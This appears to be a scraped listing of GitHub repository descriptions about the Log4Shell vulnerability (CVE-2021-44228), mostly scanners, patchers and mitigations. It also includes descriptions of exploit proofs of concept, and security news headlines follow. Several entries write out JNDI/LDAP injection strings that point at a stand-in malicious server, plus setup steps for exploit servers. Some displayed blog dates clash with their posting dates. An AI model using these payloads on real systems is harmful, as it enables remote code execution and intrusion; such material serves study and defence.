nuclei_templates Collection of Nuclei Template githubcom/ayadim/Nuclei-bug-hunter githubcom/pikpikcu/nuclei-templates githubcom/esetal/nuclei-bb-templates githubcom/ARPSyndicate/kenzer-templates githubcom/medbsq/ncl githubcom/notnotnotveg/nuclei-custom-templates githubcom/foulenzer/foulenzer-templates github

Build a devil container image

Carbon Black Container devil image Introduction In order to test all the great features of Carbon Black Container, you need to put on the hat of a bad and malicious developer for a few minutes With this little piece of code, you will create a malicious container image that is not dangerous, but will perform some malicious actions: run a fake Linux malware: cctest run a cr

log4j-poc An LDAP RCE exploit for CVE-2021-44228 Log4Shell Description The demo Tomcat 8 server on port 8080 has a vulnerable app (log4shell) deployed on it and the server also vulnerable via user-agent attacks The remote exploit app in this demo is based on that found at githubcom/kozmer/log4j-shell-poc This demo tomcat server (Tomcat 853, Java 180u51) has been r

This is a simple fork of James Kettle's excellent Collaborator Everywhere, with the injection parameters changed to payloads for the critical log4j CVE-2021-44228 vulnerability This extension only works on in-scope traffic, and works by injecting headers into your proxy traffic with log4j exploits To avoid false positives with pingbacks such as with DNS requests made fro

Ingest GreyNoise.io malicious feed for CVE-2021-44228 and apply null routes

log4j-nullroute Quick script to ingest IP feed from greynoiseio for log4j (CVE-2021-44228) and null route bad addresses Works w/Cisco IOS-XE and Arista EOS Use the exceptions file to omit any IPs you find in the list that you do not want to null route Required fill-ins for vars: secretspy username, password, api_key nullroutepy edge_routers

A Proof-Of-Concept Exploit for CVE-2021-44228 vulnerability.

Log4j Simple Exploit A Proof-Of-Concept Exploit for CVE-2021-44228 vulnerability Log4j, which is used to log security and performance information, impacts upwards of 3 billion devices that use Java across a variety of consumer and enterprise services, websites and applications, as well as medical devices and supporting systems Note: This is not a "point and click" e

A simple program to demonstrate how Log4j vulnerability can be exploited ( CVE-2021-44228 )

Log4j_Vulnerability_Demo A simple program to demonstrate how Log4j vulnerability can be exploited ( CVE-2021-44228 ) Running the Demo : To start the program, simply run the startsh ( on UNIX systems ) or startbat on Windows User input will be read and logged to console using the Log4j framework By default, the logging messages generated by the Log4j library do not provide a

An Awesome List of Log4Shell resources to help you stay informed and secure! 🔒

Awesome Log4Shell A curated list of awesome links related to the Log4Shell vulnerability Contents Explanation Videos Vulnerable Software Detection &amp; Remediation Articles Twitter Discussions Examples &amp; Proofs of Concept Memes Contribute Explanation MITRE CVE - Official CVE page from MITRE Snyk Blog Writeup - Java Champion Brian Vermeer's in depth expla

A lab & assignment for CSC427

Warning: This Repository is only for educational purposes Index Index Introduction Prerequesites Need help installing? Setup the environment Docker Setup Java Setup Maven Setup Lab Instructions Setting up victim and attacker's environment Setting up victim's environment Setting up attacker's environment Executing the attack Lab Questions References I

Log4jUnifi Exploiting CVE-2021-44228 in Unifi Network Application for remote code execution and more Another Log4j on the fire: Unifi see also : wwwyoutubecom/watch?v=NLf1xzdlfCE Why? Proof of concepts for this vulnerability are scattered and have to be performed manually This repository automates the exploitation process See the blog post above for guidance on p

CVE-2021-44228

Disclaimer This project is for personal practice purposes only CVE-2021-44228 log4j-shell-poc Exploit This project demonstrates how to exploit the Apache Log4j vulnerability to gain access to a remote shell using a reverse shell command Getting Started To get started with this project, follow the steps below: Prerequisites Virtual Box Docker JAVA SE Development kit 8u20 Ins

A community sourced list of log4j-affected software

CISA Log4j (CVE-2021-44228) Vulnerability Guidance This repository provides CISA's guidance and an overview of related software regarding the Log4j vulnerability (CVE-2021-44228) CISA urges users and administrators to upgrade to Log4j 2171 (Java 8), 2124 (Java 7) and 232 (Java 6), and review and monitor the Apache Log4j Security Vulnerabilities webpage for updates a

Tools for investigating Log4j CVE-2021-44228

Log4jTools Tools for investigating Log4j CVE-2021-44228 Bug explanation and Demo wwwyoutubecom/watch?v=0-abhd-CLwQ FetchPayloadpy (Get java payload from ldap path provided in JNDI lookup) Requirements: curl (system), requests (python) Example command: python FetchPayloadpy ldap://maliciouserver:1337/path [+] getting object from ldap://maliciouserver:1337/path [+]

log4j vulnerability test

oregon Project to look at CVE-2021-44228 Prerequisites You'll need some of the Panopset projects (compat, ophoneypot, opmysql, and opspring), easiest way to get thim in your local repo is: git clone github:/panopset/src cd src/shoring mvn install Structure Naming convention for our stuff will be Oregon cities, we'll keep the names of copied code from cybereason a

fun with log4shell and docker This repo to proof exploitation in latest java version exist too ! Please do not rely on your java version to be safe and upgrade log4j package ! vulnerable app from : githubcom/christophetd/log4shell-vulnerable-appgit vulnerability explained : mbechlergithubio/2021/12/10/PSA_Log4Shell_JNDI_Injection/ This is a POC of the

Mitigation for Log4Shell Security Vulnerability CVE-2021-44228

Details and Mitigation Strategy for log4j2 RCE Vulnerability Visit this Youtube video for additional details youtube/jqWdwTeGRK0 This is a quick post on the mitigation for CVE-2021-44228 Security Vulnerability aka Log4Shell and LogJam found in log4j2 Disclaimer All the information and accompanying code samples and examples are provided for educational and information

Vulnerable spring boot application for CIT 562 - Group 1 final project.

Log4Shell sample vulnerable application (CVE-2021-44228) This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell It uses Log4j 2141 (through spring-boot-starter-log4j2 261) and the JDK 180_181 Prequisites Software Required: Java 11 (OpenJDK) MySQL Configuration: Set JAVA_HOME path Check JAVA_HOME path (should point t

elastic_search elastic_search란?? : wwwyoutubecom/watch?v=CU2hFK5ZMYA elastic_Search 설치하는 다른 방법(721) : pinggooparktistorycom/5 Dev Tools 실행시키기 : ctrl+Enter Dev Tools 칸 예쁘게 뛰어쓰기 : ctrl+i elastic_search 개념 : velogio/@jakeseo_me/%EC%97%98%EB%9D%BC%EC%8A%A4%ED%8B%B1%EC%84%9C%EC%B9%98-%EC%95%8C%EC%95%84%EB

Scan your IP network and determine hosts with possible CVE-2021-44228 vulnerability in log4j library.

log4j-quick-scan Scan your IP network and determine hosts with possible CVE-2021-44228 vulnerability in log4j library There are far better and advanced tools for security audit, but many of them requires commercial penetration software or external, 3rd party service or software This script is written to be quick and independent little tool It will not confirm that your serve

POC code for log4shell with full exploitation

Log4j RCE Vulnerability (CVE-2021-44228) This is for educational purposes only This contains docker files to create the testing environment for this exploit Building and running the testing environment Start the vulnerable app and test server git clone --recursive githubcom/jsnv-dev/yet_another_log4j_POC_standalone cd yet_another_log4j_POC_standalone docker-compose up

Exploiting CVE-2021-44228 in vCenter for remote code execution and more.

Log4jCenter Exploiting CVE-2021-44228 in vCenter for remote code execution and more Blog post detailing exploitation linked below: How to exploit Log4j vulnerabilities in VMWare vCenter Why? Proof of concepts for this vulnerability are scattered and have to be performed manually This repository automates the exploitation process and showcases an additional attack path that

Vulnerable web application to test CVE-2021-44228 / log4shell and forensic artifacts from an example attack

SnapAttack Log4j / CVE-2021-44228 / log4shell Resources What's included? Damn Vulnerable Log4j App damn-vulnerable-log4j-app contains a basic vulnerable Java Servlet that logs the User Agent, HTTP GET and POST parameters with log4j It is packaged as a war file and can be deployed to servers like Tomcat See the README for more information Attack Artifacts attack-arti

Log4j2-CVE-2021-44228 介绍 Log4J的漏洞复现 软件架构 软件架构说明 安装教程 git clone giteecom/demonbhao/log4j2-cve-2021-44228git 安装JDK180以下版本 安装maven,打包需要 使用说明 编写你的poc代码块 编译Exploitjava javac Exploitjava 形成Exploitclass 开启LDAP协议 4开启http服务器,用python简单开启,

An evil RMI server that can launch an arbitrary command. May be useful for CVE-2021-44228

evil-rmi-server An evil RMI server that can launch an arbitrary command May be useful for CVE-2021-44228 in a local privesc scenario Build /gradlew bootJar Run Usage: java -jar build/libs/evilRMIServer-10-SNAPSHOTjar [-hV] [-p=&lt;port&gt;] &lt;cmd&gt; An evil RMI Server to help construct and run an arbitrary command &lt;cmd&gt;

Blogpost Preventing the Log4j zero-day vulnerability using a simple network policy If you have access to the internet, it’s likely that you have already heard of the critical vulnerability in the Log4j library A zero-day vulnerability in the Java library log4j, with the assigned CVE code of CVE-2021-44228, has been disclosed by Chen Zhaojun, a security researcher in the

CVE-2021-44228

CVE-2021-44228 An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled This script will help to detect log4j exploit from the running process It helps to find if any system is exploitable or not, without actully exploiting the code It will try to fetch process those usi

Log4J Updater Bash Script to automate the framework update process on numerous machines and prevent the CVE-2021-44228

Log4j Updater With the inevitable need to update the famous Java framework called Log4j, numerous companies are needing to update Log4j on several computers at the same time, which takes time and cost, and that's where the Log4j Updater comes in log4jupdatersh is a simple bash script with the aim of automatically detecting the package manager to be used by the system and

Fixes CVE-2021-44228 in log4j by patching JndiLookup class

log4j-vulnerability-patcher-agent This agent fixes critical vulnerability CVE-2021-44228 in log4j by patching JndiLookup class, as recommended here WARNING: this is not a substitute for proper upgrade to log4j 2150, where this vulnerability was fixed for good Use this agent IF, and ONLY IF, you can't upgrade log4j in your app Agent can run on JRE 8 and higher, in any

CVE-2021-44228 Short example on how to use the dependency-check plugin to detect CVE vulnerabilities in your dependencies &lt;build&gt; &lt;plugins&gt; &lt;plugin&gt; &lt;groupId&gt;orgowasp&lt;/groupId&gt; &lt;artifactId&gt;dependency-check-maven&lt;/artifactId&gt; &lt

Simulating Log4j Remote Code Execution (RCE) vulnerability in a flask web server using python's logging library with custom formatter that simulates lookup substitution by executing remote exploit code.

py4jshell Simulating Log4j Remote Code Execution (RCE) CVE-2021-44228 vulnerability in a flask web server using python's logging library with custom formatter that simulates lookup substitution on URLs This repository is a POC of how Log4j remote code execution vulnerability actually works, but written in python Instead of using JNDI+LDAP, HTTP protocol is used for explo

UNIVR - Fondamenti di Sicurezza e Privacy - Project 2022

UNIVR - Fondamenti di Sicurezza e Privacy - Project 2022 Warning ⚠️ This repository is for educational purpose only so do not use it on machines that are not yours ⚠️ Do not run ransomwaresh except in your dedicated test virtual machine Any file with the chosen extension will be encrypted, so be careful as you may lose your files To simulate CVE-2021-442281, Log4

java-slf4j-logging-example Log Level Just a clarification about the set of all possible levels, that are: ALL &lt; TRACE &lt; DEBUG &lt; INFO &lt; WARN &lt; ERROR &lt; FATAL &lt; OFF If the log level of system is INFO, then logs of the WARN, ERROR, FATAL, and OFF levels can be output normally Level Descript

CVE-2021-44228 server-side fix for minecraft servers.

mc-log4j-patcher Replaces old (vulnerable - CVE-2021-44228) Log4j2 version with the latest one (2150) that contains the JNDI RCE fix Tested on Spigot 1122, PaperSpigot 188, PaperSpigot 1171 This is intended to fix servers that are currently unsupported, such as PaperSpigot 188 Please check if your current server software has an official release fixing the vulnerabili

A Proof-Of-Concept for the CVE-2021-44228 vulnerability.

log4j-shell-poc A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability Recently there was a new vulnerability in log4j, a java logging library that is very widely used in the likes of elasticsearch, minecraft and numerous others In this repository there is an example vulnerable application and proof-of-concept (POC) exploit of it Proof-of-concept (POC) As a

Java agent that disables Apache Log4J's JNDI Lookup. Fixes CVE-2021-44228, aka "Log4Shell."

Log4NoShell A Java Agent that disables Apache Log4J's JNDI Lookup to aid against CVE-2021-44228 ("Log4Shell") If possible, update your program to use the latest Log4J version, as the vulnerability is fixed as of version 2171 Otherwise, download log4noshell-04-SNAPSHOT-shadedjar and continue reading Usage To use Java Agents, you must specify them with the -

log4j-shell-poc A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability Recently there was a new vulnerability in log4j, a java logging library that is very widely used in the likes of elasticsearch, minecraft and numerous others In this repository we have made and example vulnerable application and proof-of-concept (POC) exploit of it A video showing the exp

Log4j Shield - fast ⚡, scalable and easy to use Log4j vulnerability CVE-2021-44228 finder and patcher

Demo • Features • Requirements • Installation • Usage • Contributing • Contact Log4j Shield - fast ⚡, scalable and easy to use finder and patcher No Log4j vulnerability left behind You can use this tool to scan for all JAR files affected by Apache Log4J vulnerability CVE-2021-44228 and patch them on the fly Affected versions &lt; 2150 Fe

log4jvulnerable machine

Log4j Vulnerability Log4j vulnerability demo for CVE-2021-44228 It is based on proof of concept demo by Kozmer and few modifications were made such as adding python and bash to docker to trigger meterpreter A new Application was re-built using same POC demo with new log4j libraries Kozimer's POC Github Link: githubcom/kozmer/log4j-shell-poc The application is v

Log4jDemo_nonvuln

Log4j Vulnerability Log4j vulnerability demo for CVE-2021-44228 It is based on proof of concept demo by Kozmer and few modifications were made such as adding python and bash to docker to trigger meterpreter A new Application was re-built using same POC demo with new log4j libraries Kozimer's POC Github Link: githubcom/kozmer/log4j-shell-poc The application is v

Log4Shell sample vulnerable application (CVE-2021-44228) This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell It uses Log4j 2141 (through spring-boot-starter-log4j2 261) and the JDK 180_181 Running the application Run it: docker run --name vulnerable-app -p 8080:8080 ghcrio/christophetd/log4shell-vulnerable-app

A simple powershells script to scan for known affected file hashes in the December 2021 Log4j zero-day flaw

Log4jPowerShellScanner A simple powershells script to scan for known file versions containing the impacted class in the December 2021 Log4j zero-day flaw This script uses the identified versions documented here: githubcom/mubix/CVE-2021-44228-Log4Shell-Hashes/blob/main/sha1sumtxt This hash list was referenced by LunaSec at the following write-up: wwwlunasec

CVE-2021-44228 Log4Shell Detection Cheat Sheet This GitHub page is not a product of Tenable The authorative source of information from Tenable can be found at: wwwtenablecom/log4j TL;DR Make sure your plugins are updating Use the Log4Shell Vulnerability Ecosystem scan template with credentials Use the Tenableio WAS Log4Shell scan Remediate Repeat (plugins will be r

Log4j-RCE (CVE-2021-44228) Proof of Concept

Join Community Telegram CVE-2021-44228(Apache Log4j Remote Code Execution) Affected versions &lt; 2150 Usage: git clone githubcom/PwnC00re/CVE-2021-44228-Apache-Log4j-Rcegit cd apache-log4j-poc/src/main/java javac Exploitjava python -m SimpleHTTPServer 8888 cd tools java -cp marshalsec-003-SNAPSHOT-alljar marshal

Log4j Vulnerability (CVE-2021-44228) This repo contains operational information regarding the vulnerability in the Log4j logging library (CVE-2021-44228) For additional information see: NCSC-NL advisory MITRE Repository contents Directory Purpose iocs Contains any Indicators of Compromise, such as scanning IPs, etc mitigation Contains info regarding mitigation, such

Remote Code Injection In Log4j

CVE-2021-44228 Remote Code Injection In Log4j twittercom/jas502n/status/1468946197629272066 SpringBoot-pomxml default use : &lt;dependency&gt; &lt;groupId&gt;orgspringframeworkboot&lt;/groupId&gt; &lt;artifactId&gt;spring-boot-starter-web&lt;/artifactId&gt; &lt;/dependency&gt;

Log4jScanner script to confirm the vulnerability of the given target IP/URL.

log4jScanner log4jScannersh is a BASH script to validate the vulnerability (CVE-2021-44228) of a given IP/URL The script perfectly validates the existence of the vulnerability based on the RETURN traffic of 4 protocols ldap | ldaps | rmi | dns Thus, the testing methedology is completely safe and non-invasive Understand The Attack Vector: First and foremost, I suggest reviewi

CVE-2021-44228

log4j-CVE-2021-44228 On December 5, 2021, Apache identified a vulnerability (later identified as CVE-2021-44228) in their widely used Log4j logging service The vulnerability, also known as Log4shell, enables attackers to gain full control of affected servers by allowing unauthenticated remote code execution if the user is running an application utilizing the Java logging libra

lihaoyi lihaoyi lefou lefou Your shiny new Java/Scala build tool!

Mill Your shiny new Scala build tool! Confused by SBT? Frustrated by Maven? Perplexed by Gradle? Give Mill a try! Documentation If you want to use Mill in your own projects, check out our documentation: Documentation Here is some quick example, so that you can imagine how it looks: import mill_, scalalib_ object foo extends ScalaModule { def scala

☕ Java utilities and JUnit integration for LocalStack

⚠️ Note: This repo is not currently very actively maintained Please consider using the Testcontainers LocalStack Java module as a potential alternative LocalStack Java Utils Java utilities and JUnit integration for LocalStack Prerequisites Java Maven Docker LocalStack Usage In order to use LocalStack with Java, this project provides a simple JUnit runner and a JUnit 5

Log4jExploitDemo A log4j vulnerable app used in a log4j session as a demo and proof of concept for the recently discovered CVE-2021-44228 vulnerability Setup and exploitation Steps Compile Exploitjava and start http server cd Log4jExploitDemo/exploit javac Exploitjava start http server,python python3 -m httpserver or php,php -S 127001:8000 Start ldap server git

Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more.

Log4jHorizon Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more Crossing the Log4j Horizon - A Vulnerability With No Return Code and READMEmd this time around are a little scatered Updates coming! Why? Proof of concepts for this vulnerability are scattered and have to be performed manually This repository automates the exploitation process See

To determine if a host is vulnerable to log4j CVE‐2021‐44228

check-log4j This tool will try to determine if the host it is running on is likely vulnerable to the latest reason that the internet is on fire: the log4j RCE CVE‐2021‐44228 This is different from other tools that attempt to verify whether a specific service is vulnerable by triggering the exploit and eg, tracking pingbacks on a DNS canary token That approach tells you

My starred Repos

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents ai algorithm analytics android angular ansible api archlinux arduino artificial-intelligence automation awesome awesome-list aws azure backend bash bootstrap bot c chatgpt chatgpt-api chrome chrome-extension cli clojure code compiler computer-science cpp csharp css cybersecurity dart data-analys

Apache Log4j 远程代码执行

CVE-2021-44228(Apache Log4j Remote Code Execution) all log4j-core versions &gt;=20-beta9 and &lt;=2141 The version of 1x have other vulnerabilities, we recommend that you update the latest version Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228) Usage: download this project, compile the exploit code blob/master/src/main/java/Exploitjava, an

This is a demo of the log4j vulnerability also called log4Shell

log4j-vulnerability (CVE-2021-44228) This is a demo of the log4j vulnerability also called log4Shell (CVE-2021-44228) Using Java 11, Maven, spring-boot-starter-log4j2, spring-boot-starter-web, spring-boot-starter 261 With JNDIExploit you can spin up a malicious LDAP server wget githubcom/feihong-cs/JNDIExploit/releases/download/v12/JNDIExploitv12zip unzip JNDI

Ansible Playbook to clone and execute log4shell-detector

log4shell-detector Playbook This simple Ansible Playbook can be used to clone and execute the log4shell-detector pyhon script to detect CVE-2021-44228 exploit attempts in your infrastructure The playbook will save the findings for each host under reports/{hostname} Instructions Clone the repository git clone githubcom/kaipee/log4shell-detector-playbookgit

Multithreaded log4j vulnerability scanner using only bash! Tests all JNDI protocols, HTTP GET/POST, and 84 headers.

log4j-scan-turbo (Multi-threaded scanner) Test for the log4j vulnerability ( CVE-2021-44228 ) across your external footprint This is a very fast, multi-threaded, log4j vulnerability tester Details Pure bash scanner Uses nohup and curl to achieve multiple threads Curl configured to use a 3 second client to server maximum and six second total time setting 48 parallel calls at

Deobfuscate Log4Shell payloads with ease.

Ox4Shell Deobfuscate Log4Shell payloads with ease Description Since the release of the Log4Shell vulnerability (CVE-2021-44228), many tools were created to obfuscate Log4Shell payloads, making the lives of security engineers a nightmare This tool intends to unravel the true contents of obfuscated Log4Shell payloads For example, consider the following obfuscated payload: ${zr

The Next Log4jshell?! Preparing for CVEs with eBPF! This repository contains the demo and the corresponding instructions that was presented at KubeCon 2023 EU, Amsterdam during the The Next Log4jshell?! Preparing for CVEs with eBPF! presentation Environment Create a one node Ubuntu cluster: gcloud container clusters create "${NAME}" \ --zone europe-central2-a \ -

https://github.com/christophetd/log4shell-vulnerable-app.git

Log4Shell sample vulnerable application (CVE-2021-44228) This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell It uses Log4j 2141 (through spring-boot-starter-log4j2 261) and the JDK 180_181 Running the application Run it: docker run --name vulnerable-app -p 8080:8080 ghcrio/christophetd/log4shell-vulnerable-app

Some tools to help mitigating Apache Log4j 2 CVE-2021-44228

JndiLookup Some tool to help analyzing Apache Log4j 2 CVE-2021-44228 This tool uses the "lookup" feature from log4j-2 to test against the JNDI vulnerability The objective is to easily run the lookup feature (to normalize logs for example or to do a real testing on some payload - please be cautious) To build : "make" (for convenience, the JndiLookupjar fil

Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228 introduction A Remote Code Execution vulnerability has been found related to the Java logging library Log4j CVE-2021-44228 This vulnerability has caused a stir in the global cyber community, since the Wannacry we have not seen such an impact the reason: Most apps written in Java are thought to be affected and vulnerable, parti

Hot-patch CVE-2021-44228 by exploiting the vulnerability itself.

cve-2021-44228-qingteng-online-patch What is this Hot-patch CVE-2021-44228 by exploiting the vulnerability itself How to use Inject the following code to anywhere likely vulnerable to CVE-2021-44228, ${jndi:ldap://your-own-server/patch} To prevent MITM attack during the patch process, the following payload is recommended, but with less c

Learn Java Security Vulneriability 项目介绍 作为Java安全初学者,经常在搭建调试环境时遇到各类问题(依赖包等等)。因此将自己调试所用的项目环境整理在此,通过IDEA可以方便的运行各个漏洞环境进行调试分析 漏洞环境列表 dubbo f5 BIGIP fastjson mysql-connector-java rce &amp; fileread rmi shiro auth bypa

vulnerability POC

This is an example of exploiting CVE-2021-44228 A Log4J2 RCE vulnerability I'm not responsible for this code PLEASE do not use maliciously CVE-2021-44228: This vulnerability allows you to execute arbitrary code by logging a malicious message on the target machine For example, you can use it in Minecraft by sending a chat message, and the server/player machine will log t

An agent-based approach to mitigating log4shell

JndiLookupRemover A Java agent which mitigates CVE-2021-44228 (log4shell) by patching the JndiLookup class How to use Download the latest release and add it as a Java agent to your application using -javaagent:&lt;release jar path&gt; What it does JndiLookupRemover patches log4j so that JNDI lookups return the static string !!PREVENTED JNDI LOOKUP!! This prevents the

Recent Articles

Log4j Vulnerabilities: Attack Insights
Symantec Threat Intelligence Blog • Siddhesh Chandrayan • 23 Dec 2024

Symantec data shows variation and scope of attacks.

Posted: 23 Dec, 20214 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinLog4j Vulnerabilities: Attack InsightsSymantec data shows variation and scope of attacks.Apache Log4j is a Java-based logging utility. The library’s main role is to log information related to security and performance to make error debugging easier and to enable applications to run smoothly. The library is part of the Apache Logging Services, a project of the A...

Apache Log4j Zero-Day Being Exploited in the Wild
Symantec Threat Intelligence Blog • Threat Hunter Team • 11 Dec 2024

Symantec products will protect against attempted exploits of critical CVE-2021-44228 vulnerability

Posted: 11 Dec, 20211 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinApache Log4j Zero-Day Being Exploited in the WildSymantec products will protect against attempted exploits of critical CVE-2021-44228 vulnerability A zero-day vulnerability (CVE-2021-44228) has been discovered in Apache Log4j which, if exploited, could permit a remote attacker to execute arbitrary code on vulnerable systems. Exploit code for this vulnerability, ...

Budworm: Espionage Group Returns to Targeting U.S. Organizations
Symantec Threat Intelligence Blog • 13 Oct 2024

Posted: 13 Oct, 20225 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinBudworm: Espionage Group Returns to Targeting U.S. OrganizationsRecent attacks by group have spanned continents and include first confirmed attacks seen against the U.S. in a number of years.The Budworm espionage group has mounted attacks over the past six months against a number of strategically significant targets, including the government of a Middle Eastern country, a mul...

Ransomware: How Attackers are Breaching Corporate Networks
Symantec Threat Intelligence Blog • Karthikeyan C Kasiviswanathan Vishal Kamble • 28 Apr 2024

Latest tools, tactics, and procedures being used by the Hive, Conti, and AvosLocker ransomware operations.

Posted: 28 Apr, 20228 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinRansomware: How Attackers are Breaching Corporate NetworksLatest tools, tactics, and procedures being used by the Hive, Conti, and AvosLocker ransomware operations.Targeted ransomware attacks continue to be one of the most critical cyber risks facing organizations of all sizes. The tactics used by ransomware attackers are continually evolving, but by identifying the most freq...

Stonefly: North Korea-linked Spying Operation Continues to Hit High-value Targets
Symantec Threat Intelligence Blog • Threat Hunter Team • 27 Apr 2024

Espionage group focuses on obtaining classified or sensitive intellectual property that has civilian and military applications.

Posted: 27 Apr, 20225 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinStonefly: North Korea-linked Spying Operation Continues to Hit High-value TargetsEspionage group focuses on obtaining classified or sensitive intellectual property that has civilian and military applications.The North Korean-linked Stonefly group is continuing to mount espionage attacks against highly specialized engineering companies with a likely goal of obtaining sensitive...

The Threat Landscape in 2021
Symantec Threat Intelligence Blog • Threat Hunter Team • 19 Jan 2024

Symantec takes a look at the cyber security trends that shaped the year

Posted: 19 Jan, 20226 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinThe Threat Landscape in 2021Symantec takes a look at the cyber security trends that shaped the yearFrom the evolving ransomware ecosystem to attacks against critical infrastructure, Symantec looks back over the cyber-security trends that shaped 2021. A new whitepaper from Symantec, a division of Broadcom Software, takes a look back at the some of the major thre...

IT threat evolution in Q3 2023. Non-mobile statistics
Securelist • AMR • 01 Dec 2023

These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures According to Kaspersky Security Network, in Q3 2023: Kaspersky solutions blocked 694,400,301 attacks from online resources across the globe. A total of 169,194,807 unique links were recognized as malicious by Web Anti-Virus components. Attempts to run malware for stealing money from online bank accounts were stopped on the com...

IT threat evolution in Q2 2023. Non-mobile statistics
Securelist • AMR • 30 Aug 2023

IT threat evolution in Q2 2023 IT threat evolution in Q2 2023. Non-mobile statistics IT threat evolution in Q2 2023. Mobile statistics These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures According to Kaspersky Security Network, in Q2 2023: Kaspersky solutions blocked 801,934,281 attacks from online resources across the globe. A total of 209,716,810 unique links were detected by Web ...

IT threat evolution in Q1 2023. Non-mobile statistics
Securelist • AMR • 07 Jun 2023

IT threat evolution in Q1 2023 IT threat evolution in Q1 2023. Non-mobile statistics IT threat evolution in Q1 2023. Mobile statistics These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures According to Kaspersky Security Network, in Q1 2023: Kaspersky solutions blocked 865,071,227 attacks launched from online resources across the globe. Web Anti-Virus detected 246,912,694 unique URLs ...

IT threat evolution in Q3 2022. Non-mobile statistics
Securelist • AMR • 18 Nov 2022

IT threat evolution in Q3 2022 IT threat evolution in Q3 2022. Non-mobile statistics IT threat evolution in Q3 2022. Mobile statistics These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures According to Kaspersky Security Network, in Q3 2022: Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe. Web Anti-Virus recognized 251,288,987...

IT threat evolution in Q2 2022. Non-mobile statistics
Securelist • AMR • 15 Aug 2022

IT threat evolution in Q2 2022 IT threat evolution in Q2 2022. Non-mobile statistics IT threat evolution in Q2 2022. Mobile statistics These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures According to Kaspersky Security Network, in Q2 2022: Kaspersky solutions blocked 1,164,544,060 attacks from online resources across the globe. Web Anti-Virus recognized 273,033,368 unique URLs as ma...

Four million outdated Log4j downloads were served from Apache Maven Central alone despite vuln publicity blitz
The Register • Gareth Corfield • 11 Jan 2022

Get our weekly newsletter It's not as though folks haven't been warned about this

There have been millions of downloads of outdated, vulnerable Log4j versions despite the emergence of a serious security hole in December 2021, according to figures compiled by the firm that runs Apache Maven's Central Repository. That company, Sonatype, said it had seen four million downloads of exploitable Log4j versions from the repository alone between 10 December and the present day, out of a total of more than 10 million downloads over those past four weeks. Tracked as CVE-2021-44228 aka L...

You better have patched those Log4j holes or we'll see what a judge has to say – FTC
The Register • Thomas Claburn in San Francisco • 05 Jan 2022

Get our weekly newsletter Apply fixes responsibly in a timely manner or face the wrath of Lina Khan

The US Federal Trade Commission on Tuesday warned companies that vulnerable Log4j software needs to be patched … or else. In case any system administrators last month somehow missed the widespread alarm over vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-44832) in the Java logging package, the trade watchdog said Log4j continues to be exploited by a growing number of attackers and urged organizations to act now before it's too late. The FTC is advising companies to consult the US Cy...

Bad things come in threes: Apache reveals another Log4J bug
The Register • Simon Sharwood, APAC Editor • 19 Dec 2021

Get our weekly newsletter Third major fix in ten days is an infinite recursion flaw rated 7.5/10

The Apache Software Foundation (ASF) has revealed a third bug in its Log4 Java-based open-source logging library Log4j. CVE-2021-45105 is a 7.5/10-rated infinite recursion bug that was present in Log4j2 versions 2.0-alpha1 through 2.16.0. The fix is version 2.17.0 of Log4j. That’s the third new version of the tool in the last ten days. In case you haven’t been paying attention, version 2.15.0 was created to fix CVE-2021-44228, the critical-rated and trivial-to-exploit remote code execution f...

CISA issues emergency directive to fix Log4j vulnerability
The Register • Thomas Claburn in San Francisco • 17 Dec 2021

Get our weekly newsletter Federal agencies have a week to get their systems patched

The US government's Cybersecurity and Infrastructure Security Agency (CISA) on Friday escalated its call to fix the Apache Log4j vulnerability with an emergency directive requiring federal agencies to take corrective action by 5 pm EST on December 23, 2021. Log4j is a Java-based open source logging library used in millions of applications. Versions up to and including 2.14.1 contain a critical remote code execution flaw (CVE-2021-44228), and the fix incorporated into version 2.15, released a wee...

As CISA tells US govt agencies to squash Log4j bug by Dec 24, fingers start pointing at China, Iran, others
The Register • Chris Williams, Editor in Chief • 15 Dec 2021

Get our weekly newsletter Microsoft says cyber-spies linked to Beijing, Tehran are getting busy with security flaw along with world + dog Log4j doesn't just blow a hole in your servers, it's reopening that can of worms: Is Big Biz exploiting open source?

Microsoft reckons government cyber-spies in China, Iran, North Korea, and Turkey are actively exploiting the Log4j 2.x remote-code execution hole. Up until now, it was largely accepted that mere private miscreants, criminal gangs, and security researchers were mostly scanning the internet for systems and services vulnerable to CVE-2021-44228 in the open-source logging library widely used by Java applications. Network observers say they've seen tens of thousands of attempts per minute. Successful...

Popular password manager LastPass to be spun out from LogMeIn
The Register • Jude Karabus • 14 Dec 2021

Get our weekly newsletter Private equity owners play pass the parcel

One of the biggest beasts in the password management world, LastPass, is being spun out from parent LogMeIn as a "standalone cloud security" organisation. "The success we've seen across the entire LogMeIn portfolio over the last 18 months proves there is a vast growth opportunity ahead for both LastPass and LogMeIn," said Andrew Kowal, a partner at Francisco Partners. Francisco Partners, a private equity business, bought the bundle of remote access, collab and password manager tools – which a...

Apache takes off, nukes insecure feature at the heart of Log4j from orbit with v2.16
The Register • Gareth Corfield • 14 Dec 2021

Get our weekly newsletter Now open-source logging library's JNDI disabled entirely by default, message lookups removed

